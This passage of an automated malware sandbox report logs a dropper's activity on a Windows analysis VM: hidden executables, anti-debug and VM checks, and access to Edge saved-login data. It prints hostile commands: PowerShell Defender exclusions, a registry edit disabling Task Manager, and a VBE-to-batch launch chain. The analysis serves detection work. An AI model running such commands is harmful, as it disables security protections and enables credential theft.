                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -595613s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -595325s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -595156s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -594944s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -594839s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -594718s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -594548s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -594422s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -594257s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -594147s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -593953s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -593812s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -593639s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -593466s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -593219s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -593100s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 6952 Thread sleep time: -1200000s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -592984s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -592874s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -592764s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -592656s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -592546s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -592436s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -592299s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -100000s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -99990s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -99859s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -99750s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -99641s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -99516s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -99391s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -98651s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -98538s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -98422s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -98313s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -98191s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -98078s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -97969s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -97850s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 2188 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe TID: 5232 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe TID: 4428 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 4500 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 6972 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324 Thread sleep count: 3372 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5440 Thread sleep count: 2446 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056 Thread sleep count: 3912 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 Thread sleep count: 2755 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864 Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668 Thread sleep count: 2294 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 2626 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -10145709240540247s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe TID: 6848Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\svchost.exe TID: 7912Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0004A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0004A69B
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0005C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0005C220
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0005E6A3 VirtualQuery,GetSystemInfo, 0_2_0005E6A3
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File opened: C:\Users\user
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File opened: C:\Users\user\AppData
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File opened: C:\Users\user\AppData\Local
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.2065560265.000000001C2FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: wscript.exe, 00000001.00000002.1888908009.000000000340C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.2065833724.000000001C311000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe API call chain: ExitProcess graph end node graph_0-23948
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Process information queried: ProcessInformation
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0005F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0005F838
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_00067DEE mov eax, dword ptr fs:[00000030h] 0_2_00067DEE
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0006C030 GetProcessHeap, 0_2_0006C030
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Process token adjusted: Debug
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Process token adjusted: Debug
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Process token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe Process token adjusted: Debug
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0005F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0005F838
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0005F9D5 SetUnhandledExceptionFilter, 0_2_0005F9D5
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0005FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0005FBCA
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_00068EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00068EBD
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Memory allocated: page read and write | page guard

                                    HIPS / PFW / Operating System Protection Evasion

                                    Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe'
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\webHostnet\MsPortSavesruntime.exe "C:\webHostnet/MsPortSavesruntime.exe"
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe"
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005F654 cpuid 0_2_0005F654
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0005AF0F
                                    Source: C:\webHostnet\MsPortSavesruntime.exeQueries volume information: C:\webHostnet\MsPortSavesruntime.exe VolumeInformationJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Queries volume information: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe VolumeInformation
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Queries volume information: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe VolumeInformation
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Queries volume information: C:\webHostnet\MsPortSavesruntime.exe VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0005DF1E
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004B146 GetVersionExW,0_2_0004B146
                                    Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                    Lowering of HIPS / PFW / Operating System Security Settings

                                    Source: C:\Windows\SysWOW64\reg.exe Registry value created: DisableTaskMgr 1
                                    Source: C:\Windows\SysWOW64\reg.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 00000006.00000002.2026149652.0000000013385000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: MsPortSavesruntime.exe PID: 7644, type: MEMORYSTR
                                    Source: Yara matchFile source: PbfYaIvR5B.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.MsPortSavesruntime.exe.cc0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000006.00000000.1888745544.0000000000CC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1690511695.000000000744A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1689915107.0000000006B32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\webHostnet\MsPortSavesruntime.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, type: DROPPED
                                    Source: Yara matchFile source: PbfYaIvR5B.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.MsPortSavesruntime.exe.cc0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\webHostnet\MsPortSavesruntime.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, type: DROPPED
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
